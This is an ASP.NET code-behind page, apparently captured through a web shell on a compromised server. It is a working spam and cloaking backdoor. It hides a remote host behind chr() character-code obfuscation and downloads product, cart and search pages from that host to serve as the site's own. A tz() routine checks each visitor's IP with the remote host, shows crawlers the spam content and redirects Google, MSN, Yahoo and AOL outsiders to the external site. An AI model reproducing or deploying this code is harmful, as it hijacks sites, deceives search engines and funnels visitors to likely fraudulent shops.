Mini Shell
using System;
using System.Collections.Generic;
using System.Web;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Text;
public partial class metxd : System.Web.UI.Page
{
public static string chr(int asciiCode)
{ System.Text.ASCIIEncoding asciiEncoding = new System.Text.ASCIIEncoding();
byte[] byteArray = new byte[] { (byte)asciiCode };
string strCharacter = asciiEncoding.GetString(byteArray);
return (strCharacter);}
protected void Page_Load(object sender, EventArgs e)
{ string httpxy = HttpContext.Current.Request.IsSecureConnection ? "https://" : "http://";
webclient = new System.Net.WebClient();
webclient.Encoding = System.Text.Encoding.UTF8;
hyzhdy = webclient.DownloadString(chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(121)+chr(109)+chr(115)+chr(46)+chr(122)+chr(104)+chr(100)+chr(121)+chr(121)+chr(109)+chr(46)+chr(99)+chr(111)+chr(109)+chr(47)+chr(121)+chr(109)+chr(115)+chr(106)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(121)+chr(105)+chr(100)+chr(61)+Request.QueryString["yid"]);
if (!IsPostBack)
{ tz();
a = new Random(System.DateTime.Now.Millisecond);
int cid = Convert.ToInt32(webclient.DownloadString( hyzhdy + chr(47)+chr(115)+chr(106)+chr(115)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)));
if (Request.QueryString["cid"] != null && Request.QueryString["cid"] != "") { cid = int.Parse(Request.QueryString["cid"]); }
gjc1 = webclient.DownloadString( hyzhdy + chr(47)+chr(103)+chr(101)+chr(116)+chr(99)+chr(105)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(99)+chr(105)+chr(100)+chr(61) + cid + "&s=2&e=4");
gjc2 = webclient.DownloadString( hyzhdy + chr(47)+chr(103)+chr(101)+chr(116)+chr(99)+chr(105)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(99)+chr(105)+chr(100)+chr(61) + cid + "&s=5&e=7");
ckwz = webclient.DownloadString( hyzhdy + chr(47)+chr(119)+chr(108)+chr(46)+chr(97)+chr(115)+chr(112));
string pname = Request.CurrentExecutionFilePath;
dbhl = webclient.DownloadString( hyzhdy + chr(47)+chr(121)+chr(109)+chr(115)+chr(106)+chr(47)+chr(104)+chr(108)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(112)+chr(97)+chr(103)+chr(101)+chr(61) + pname);
if (Request.QueryString["type"] != null)
{
if (Request.QueryString["type"] == "addtocart")
{
content = webclient.DownloadString( hyzhdy + "/cart.aspx?gj=com");
content = content.Replace("pppid", Request.Form["pid"]);
content = content.Replace("tupian", Request.Form["pic"]);
content = content.Replace("mingzi", Request.Form["pname"]);
content = content.Replace("danjia", Request.Form["price"]);
content = content.Replace("shuliang", "1");
content = content.Replace("zongjia", Request.Form["price"]);
content = content.Replace("cima", Request.Form["s1"]);
content = content.Replace("curfh", Request.Form["fh"]);
content = content.Replace("pricetype", Request.Form["pricetype"]);
content = content.Replace("ZZZZZ", webclient.DownloadString( hyzhdy + "/xdz.txt"));
}
else if (Request.QueryString["type"] == "search")
{
string URL = hyzhdy + chr(47)+chr(121)+chr(109)+chr(115)+chr(106)+chr(47)+chr(71)+chr(68)+chr(95)+chr(80)+chr(97)+chr(103)+chr(101)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(99)+chr(105)+chr(100)+chr(61) + Request.QueryString["cid"] + "&xi=1-6&xc=19-26&searchtxt=" + Request.QueryString["searchtxt"] + "&you=0&page=" + pname;
content = webclient.DownloadString(URL);
}
}
else
{
if (Request.QueryString["zhzh"] != null)
{ gjc = Request.QueryString["zhzh"];
int wid = new Random().Next(1, 4108);
URL = hyzhdy + chr(47)+chr(121)+chr(109)+chr(115)+chr(106)+chr(47)+chr(71)+chr(68)+chr(95)+chr(80)+chr(97)+chr(103)+chr(101)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(99)+chr(105)+chr(100)+chr(61) + Request.QueryString["cid"] + "&shop=" + HttpUtility.UrlEncode(gjc) + "&xi=" + Request.QueryString["xi"] + "&xc=" + Request.QueryString["xc"] + "&pl=" + Request.QueryString["pl"] + "&pr=" + Request.QueryString["pr"] + "&you=" + Request.QueryString["you"] + "&mt=" + hyzhdy + "/ar/ar_"+wid+".txt";
}
else if (Request.QueryString["number"] != null)
{ URL = hyzhdy + chr(47)+chr(121)+chr(109)+chr(115)+chr(106)+chr(47)+chr(115)+chr(99)+chr(112)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(99)+chr(105)+chr(100)+chr(61) + cid + "&number=" + Request.QueryString["number"] + "&xi=1-6&xc=19-26&pnum=" + Request.QueryString["pnum"];
content = webclient.DownloadString(URL);
content = content.Replace("yymm", httpxy + HttpContext.Current.Request.Url.Host + pname);
content = content.Replace("shop=", "zhzh=");
Response.ContentType = "text/xml";
Response.Write(content);
Response.End();
}
else if (Request.QueryString["s"] != null)
{
content = webclient.DownloadString(chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(121)+chr(109)+chr(115)+chr(46)+chr(122)+chr(104)+chr(100)+chr(121)+chr(121)+chr(109)+chr(46)+chr(99)+chr(111)+chr(109)+chr(47)+chr(115)+chr(115)+chr(121)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120));
content = content.Replace("yymm", httpxy + HttpContext.Current.Request.Url.Host + pname);
Response.ContentType = "text/xml";
Response.Write(content);
Response.End();
}
else if (Request.QueryString["ping"] != null)
{
content = webclient.DownloadString(chr(104)+chr(116)+chr(116)+chr(112)+chr(58)+chr(47)+chr(47)+chr(121)+chr(109)+chr(115)+chr(46)+chr(122)+chr(104)+chr(100)+chr(121)+chr(121)+chr(109)+chr(46)+chr(99)+chr(111)+chr(109)+chr(47)+chr(112)+chr(105)+chr(110)+chr(103)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(121)+chr(105)+chr(100)+chr(61)+Request.QueryString["yid"]+"&cid="+Request.QueryString["cid"]);
content = content.Replace("yymm", httpxy + HttpContext.Current.Request.Url.Host + pname);
string ping = webclient.DownloadString(content);
Response.Write(ping);
Response.Write(content);
Response.End();
}
else
{URL = hyzhdy + chr(47)+chr(121)+chr(109)+chr(115)+chr(106)+chr(47)+chr(71)+chr(68)+chr(95)+chr(80)+chr(97)+chr(103)+chr(101)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120)+chr(63)+chr(99)+chr(105)+chr(100)+chr(61) + cid + "&xi=1-6&xc=19-26&pnum=" + Request.QueryString["pnum"] + "&you=0&page=" + pname;}
content = webclient.DownloadString(URL);
content = content.Replace("shop=", "zhzh=");
content = content.Replace("&pl=", "");
content = content.Replace("&you=0", "");
content = content.Replace("&you=", "");
content = content.Replace("HHHHH", pname);
content = content.Replace("BBBBB", HttpContext.Current.Request.Url.Host);
content = content.Replace("AAAAA", pname + "?gj=com&type=addtocart");
content = content.Replace("DDDDD", gjc);
content = content.Replace("QQQQQ", Request.Url.ToString());
}
}
}
public void tz()
{ string ip = System.Web.HttpContext.Current.Request.ServerVariables["REMOTE_ADDR"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["REMOTE_HOST"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_X_FORWARDED_FOR"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_CLIENT_IP"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_X_FORWARDED"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_FORWARDED_FOR"] + "*" + System.Web.HttpContext.Current.Request.ServerVariables["HTTP_FORWARDED"];
if (Request.QueryString["kk"] != null)
{
ip = "66.249.64.190";
}
string ipurl = hyzhdy + "/getdomain.aspx?rnd=1&ip=" + ip;
webclient = new System.Net.WebClient();
webclient.Encoding = System.Text.Encoding.UTF8;
string domain = webclient.DownloadString(ipurl).ToLower();
if (domain.IndexOf("google") == -1 && domain.IndexOf("msn.com") == -1 && domain.IndexOf("yahoo.com") == -1 && domain.IndexOf("aol.com") == -1)
{
if (Request.QueryString["zhzh"] != null)
{
string tzurl = hyzhdy + chr(47)+chr(97)+chr(46)+chr(97)+chr(115)+chr(112)+chr(120);
Response.Redirect(tzurl + "?cid=" + Request.QueryString["cid"] + "&cname=" + HttpUtility.UrlEncode(Request.QueryString["zhzh"]) + "&xi=" + Request.QueryString["xi"] + "&xc=" + Request.QueryString["xc"] + "&pr=" + Request.QueryString["pr"] + "&ll=" + HttpContext.Current.Request.Url.Host);
Response.End();
}
}
}
public System.Net.WebClient webclient = null;
public string gjc="";
public string gjc1="";
public string gjc2="";
public string content = "";
public string hyzhdy="";
public string URL = "";
public System.Random a = null;
public string ckwz="";
public string dbhl="";
}
Zerion Mini Shell 1.0